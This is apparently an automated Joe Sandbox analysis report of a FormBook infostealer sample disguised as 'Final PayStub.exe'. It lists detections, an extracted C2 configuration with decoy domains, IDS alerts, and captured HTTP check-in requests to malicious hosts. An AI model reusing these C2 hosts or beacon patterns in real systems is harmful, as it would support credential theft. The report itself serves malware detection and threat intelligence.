2025-03-10T12:13:57.354865+0100	2031453	1	Malware Command and Control Activity Detected	192.168.2.6	49699	150.95.255.38	80	TCP
2025-03-10T12:14:15.832051+0100	2031453	1	Malware Command and Control Activity Detected	192.168.2.6	49700	104.21.32.1	80	TCP
2025-03-10T12:14:40.549903+0100	2031453	1	Malware Command and Control Activity Detected	192.168.2.6	49702	18.130.191.149	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Final PayStub.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.cleaning-services-18202.bond/g43m/	Avira URL Cloud: Label: malware
Source: http://www.cleaning-services-18202.bond	Avira URL Cloud: Label: malware
Source: http://www.cleaning-services-18202.bond/g43m/www.gtja885.xyz	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.oddsideodylicoopod.cloud/g43m/"], "decoy": ["657839.club", "4hz5biuup99147yw.xyz", "purrizon.life", "brotulabunionsburack.cloud", "flow20.club", "sityk.shop", "basesatoshi.xyz", "bdxhivua.icu", "bnmvchjfdskqwe.monster", "localorganicbd.xyz", "9bets.net", "biudy.autos", "mikelowe.net", "investing-courses-36092.bond", "bankersbasogabergamo.cloud", "gangmot.pro", "everythingnatural.shop", "semijepang.fun", "t90oq236d.shop", "advcash.financial", "aeigi.autos", "security-apps-66355.bond", "velvetwavez.shop", "insulate-attic-98951.bond", "ptpros.xyz", "yapimaster.xyz", "zyxir.autos", "evosystems.cloud", "iches888.asia", "7mwh-2ghmv.xyz", "ar-inc.net", "smartrbaskets.net", "xrmkh.autos", "personal-loans-49223.bond", "jcmds.autos", "shrinivas.shop", "vego789x.pro", "opaclw.info", "cleaning-services-18202.bond", "gazda.army", "blockchainbetting.xyz", "igmommymilk.xyz", "marko.events", "newtoday.news", "bgame777v.pro", "chocolate-packaging-jobs08.buzz", "storage-cabinets-47807.bond", "iyduvszv.group", "persoonlijke-lening-2.today", "truck-driver-jobs-60289.bond", "729709.bid", "work-abroad-72336.bond", "rivierafinancial.tech", "usaworldpageant.net", "sstrs.autos", "gtja885.xyz", "furniture-38563.bond", "oldfox.info", "quantaquiteveramnes.cloud", "truthverse.xyz", "pillow-48640.bond", "deafow.shop", "pixiesol.lol", "ct-ad.autos"]}

Multi AV Scanner detection for submitted file

Source: Final PayStub.exe	Virustotal: Detection: 56%			Perma Link
Source: Final PayStub.exe	ReversingLabs: Detection: 60%

Yara detected FormBook

Source: Yara match	File source: 6.2.Final PayStub.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Final PayStub.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2468663699.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2467525905.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1304138024.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2468573354.0000000003120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1246427510.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Final PayStub.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Final PayStub.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: systray.pdb source: Final PayStub.exe, 00000006.00000002.1304676921.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Final PayStub.exe, 00000006.00000002.1304525293.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, systray.exe, systray.exe, 0000000D.00000002.2467199578.0000000000490000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: systray.pdbGCTL source: Final PayStub.exe, 00000006.00000002.1304676921.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Final PayStub.exe, 00000006.00000002.1304525293.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000D.00000002.2467199578.0000000000490000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Final PayStub.exe, 00000006.00000002.1304776386.0000000001350000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000D.00000003.1304593236.0000000004A2B000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000D.00000003.1307102340.0000000004BD6000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000D.00000002.2469950019.0000000004F1E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000D.00000002.2469950019.0000000004D80000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Final PayStub.exe, Final PayStub.exe, 00000006.00000002.1304776386.0000000001350000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 0000000D.00000003.1304593236.0000000004A2B000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000D.00000003.1307102340.0000000004BD6000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000D.00000002.2469950019.0000000004F1E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000D.00000002.2469950019.0000000004D80000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 4x nop then pop ebx		6_2_00407B21
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop ebx		13_2_02BA7B21

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49700 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49696 -> 67.211.70.30:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49696 -> 67.211.70.30:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49696 -> 67.211.70.30:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49700 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49700 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49702 -> 18.130.191.149:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49702 -> 18.130.191.149:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49702 -> 18.130.191.149:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49699 -> 150.95.255.38:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49699 -> 150.95.255.38:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49699 -> 150.95.255.38:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.32.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 150.95.255.38 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 18.130.191.149 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 67.211.70.30 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.oddsideodylicoopod.cloud/g43m/

Performs DNS queries to domains with low reputation

Source:

DNS query: www.truthverse.xyz

Source: global traffic	HTTP traffic detected: GET /g43m/?chops=VTj0v6ZXr6p4dp&Ezr8U8lh=TSba4AFrOy9v8mgRHc8DsoNuVeK6ub9lAcXCbtS/PjxOtV4MuRHntJNL2tF1LWbzZaeUiqs5Pg== HTTP/1.1Host: www.657839.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /g43m/?Ezr8U8lh=9XEciSnIyE7tI4mUngEzlJY/Gx4PSCv4oRCpcXW0GHlVVcvE/SbLS/hussZo8RM8WUgrQKtzgA==&chops=VTj0v6ZXr6p4dp HTTP/1.1Host: www.biudy.autosConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /g43m/?chops=VTj0v6ZXr6p4dp&Ezr8U8lh=iHr8ZanSEmppv2NUfEI3Sn+a6zMFeevffxq5V5At5Kf3VZBf0vxOCE6EQW7iEjpklZqKgy7LQg== HTTP/1.1Host: www.oddsideodylicoopod.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /g43m/?Ezr8U8lh=59QjN7aIvcRWtAIw4dvTQWC2lG4Vv6rPylFzmqS7xMh5L0dZhsAnE7kLtb0vZTK4YRw4k4+jrQ==&chops=VTj0v6ZXr6p4dp HTTP/1.1Host: www.truthverse.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 150.95.255.38 150.95.255.38

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: DNC-ASDimensionNetworkCommunicationLimitedHK DNC-ASDimensionNetworkCommunicationLimitedHK
Source: Joe Sandbox View	ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 7_2_110A9F82 getaddrinfo,setsockopt,recv,

7_2_110A9F82

Source: global traffic	HTTP traffic detected: GET /g43m/?chops=VTj0v6ZXr6p4dp&Ezr8U8lh=TSba4AFrOy9v8mgRHc8DsoNuVeK6ub9lAcXCbtS/PjxOtV4MuRHntJNL2tF1LWbzZaeUiqs5Pg== HTTP/1.1Host: www.657839.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /g43m/?Ezr8U8lh=9XEciSnIyE7tI4mUngEzlJY/Gx4PSCv4oRCpcXW0GHlVVcvE/SbLS/hussZo8RM8WUgrQKtzgA==&chops=VTj0v6ZXr6p4dp HTTP/1.1Host: www.biudy.autosConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /g43m/?chops=VTj0v6ZXr6p4dp&Ezr8U8lh=iHr8ZanSEmppv2NUfEI3Sn+a6zMFeevffxq5V5At5Kf3VZBf0vxOCE6EQW7iEjpklZqKgy7LQg== HTTP/1.1Host: www.oddsideodylicoopod.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /g43m/?Ezr8U8lh=59QjN7aIvcRWtAIw4dvTQWC2lG4Vv6rPylFzmqS7xMh5L0dZhsAnE7kLtb0vZTK4YRw4k4+jrQ==&chops=VTj0v6ZXr6p4dp HTTP/1.1Host: www.truthverse.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.657839.club
Source: global traffic	DNS traffic detected: DNS query: www.biudy.autos
Source: global traffic	DNS traffic detected: DNS query: www.oddsideodylicoopod.cloud
Source: global traffic	DNS traffic detected: DNS query: www.truthverse.xyz
Source: global traffic	DNS traffic detected: DNS query: www.sityk.shop
Source: global traffic	DNS traffic detected: DNS query: www.bnmvchjfdskqwe.monster

Source: explorer.exe, 00000007.00000000.1256622166.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2476642656.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1249592340.00000000071CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: explorer.exe, 00000007.00000000.1256622166.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2476642656.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1249592340.00000000071CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000007.00000002.2473248211.0000000004415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1248918013.0000000004415000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobeJH
Source: explorer.exe, 00000007.00000000.1256622166.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2476642656.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1249592340.00000000071CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000007.00000000.1256622166.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2476642656.000000000934A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl
Source: explorer.exe, 00000007.00000000.1252326713.00000000077A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2475414960.00000000077B0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1252227316.0000000007700000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsof
Source: Final PayStub.exe, 00000000.00000002.1231363594.00000000027E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.657839.club
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.657839.club/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.657839.club/g43m/www.biudy.autos
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.657839.clubReferer:
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.biudy.autos
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.biudy.autos/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.biudy.autos/g43m/www.oddsideodylicoopod.cloud
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.biudy.autosReferer:
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bnmvchjfdskqwe.monster
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bnmvchjfdskqwe.monster/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bnmvchjfdskqwe.monster/g43m/www.gangmot.pro
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bnmvchjfdskqwe.monsterReferer:
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cleaning-services-18202.bond
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cleaning-services-18202.bond/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cleaning-services-18202.bond/g43m/www.gtja885.xyz
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cleaning-services-18202.bondReferer:
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gangmot.pro
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gangmot.pro/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gangmot.pro/g43m/www.igmommymilk.xyz
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gangmot.proReferer:
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gtja885.xyz
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gtja885.xyz/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gtja885.xyz/g43m/www.persoonlijke-lening-2.today
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gtja885.xyzReferer:
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.igmommymilk.xyz
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.igmommymilk.xyz/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.igmommymilk.xyz/g43m/www.purrizon.life
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.igmommymilk.xyzReferer:
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oddsideodylicoopod.cloud
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oddsideodylicoopod.cloud/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oddsideodylicoopod.cloud/g43m/www.truthverse.xyz
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oddsideodylicoopod.cloudReferer:
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oldfox.info
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oldfox.info/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oldfox.info/g43m/www.cleaning-services-18202.bond
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oldfox.infoReferer:
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.opaclw.info
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.opaclw.info/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.opaclw.info/g43m/docx
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.opaclw.infoReferer:
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.persoonlijke-lening-2.today
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.persoonlijke-lening-2.today/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.persoonlijke-lening-2.today/g43m/www.zyxir.autos
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.persoonlijke-lening-2.todayReferer:
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.purrizon.life
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.purrizon.life/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.purrizon.life/g43m/www.velvetwavez.shop
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.purrizon.lifeReferer:
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sityk.shop
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sityk.shop/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sityk.shop/g43m/www.bnmvchjfdskqwe.monster
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sityk.shopReferer:
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.truthverse.xyz
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.truthverse.xyz/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.truthverse.xyz/g43m/www.sityk.shop
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.truthverse.xyzReferer:
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.velvetwavez.shop
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.velvetwavez.shop/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.velvetwavez.shop/g43m/www.oldfox.info
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.velvetwavez.shopReferer:
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zyxir.autos
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zyxir.autos/g43m/
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zyxir.autos/g43m/www.opaclw.info
Source: explorer.exe, 00000007.00000002.2480510946.000000000C071000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zyxir.autosReferer:
Source: explorer.exe, 00000007.00000000.1260065086.000000000BE5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2479702809.000000000BE5D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000007.00000002.2479702809.000000000BE14000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000007.00000000.1260065086.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2479702809.000000000BE14000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSd&
Source: explorer.exe, 00000007.00000002.2476642656.00000000092FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1256622166.00000000092FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000007.00000000.1256622166.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2476642656.000000000934A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000007.00000002.2476642656.00000000091E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1256622166.00000000091E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?3
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000002.2476642656.00000000091E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1256622166.00000000091E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000007.00000000.1249592340.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: explorer.exe, 00000007.00000000.1260065086.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2479702809.000000000BE14000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000007.00000002.2474243563.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
